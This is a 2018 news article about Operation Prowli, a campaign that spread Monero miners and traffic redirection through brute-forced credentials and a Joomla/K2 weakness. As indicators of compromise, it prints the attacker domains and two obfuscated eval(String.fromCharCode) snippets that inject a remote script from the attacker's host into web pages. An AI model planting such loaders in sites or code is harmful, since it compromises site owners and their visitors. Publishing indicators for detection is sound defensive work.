en
Back to the list

40,000 of computers infected with mining viruses as part of worldwide Operation Prowli

06 June 2018 21:00, UTC

A new cybercriminal operation has been unveiled by security experts at GuardiCore, and it looks like that tens of thousands of computers were infected with mining viruses and other malicious programs.

The worldwide wave of attacks was affecting corporate computers, most victims had poor credentials. Brute force guessing was used, while in the case with servers working with Joomla and its extension called K2 there was another vulnerability that let hackers to see the sensitive info in the code. The range of affected organizations varies:

Quite expectedly, Monero was used in a set remote mining tools installed through the virus called r2r2. Another source of hackers’ income was redirection - users unwillingly saw the pages of various questionable websites with which the criminal group apparently cooperates.

This is by far the most sophisticated distant mining operation Bitnewstoday has seen. Due to the high range of methods hackers use to achieve their goals, there are different ways to counter the criminal group efforts depending on your machine. In case with r2r, it can be deleted with antiviruses and the total passwords change is required. Things get harder when dealing with servers and websites: the server administrator should check the traffic for channels to wp.startreceive[.]tk and stats.startreceive[.]tk/, while the website operator must check all JavaScript and PHP files for the following codes.

JavaScript:

eval(String.fromCharCode(118, 97, 114, 32, 122, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34, 41, 59, 32, 122, 46, 116, 121, 112, 101, 32, 61, 32, 34, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 34, 59, 32, 122, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 115, 116, 97, 116, 115, 46, 115, 116, 97, 114, 116, 114, 101, 99, 101, 105, 118, 101, 46, 116, 107, 47, 115, 99, 114, 105, 112, 116, 46, 106, 115, 63, 100, 114, 61, 49, 34, 59, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 104, 101, 97, 100, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 122, 41, 59));

PHP:

<script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 122, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34, 41, 59, 32, 122, 46, 116, 121, 112, 101, 32, 61, 32, 34, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 34, 59, 32, 122, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 115, 116, 97, 116, 115, 46, 115, 116, 97, 114, 116, 114, 101, 99, 101, 105, 118, 101, 46, 116, 107, 47, 115, 99, 114, 105, 112, 116, 46, 106, 115, 63, 100, 114, 61, 49, 34, 59, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 104, 101, 97, 100, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 122, 41, 59));</script>

Image: altcointoday.com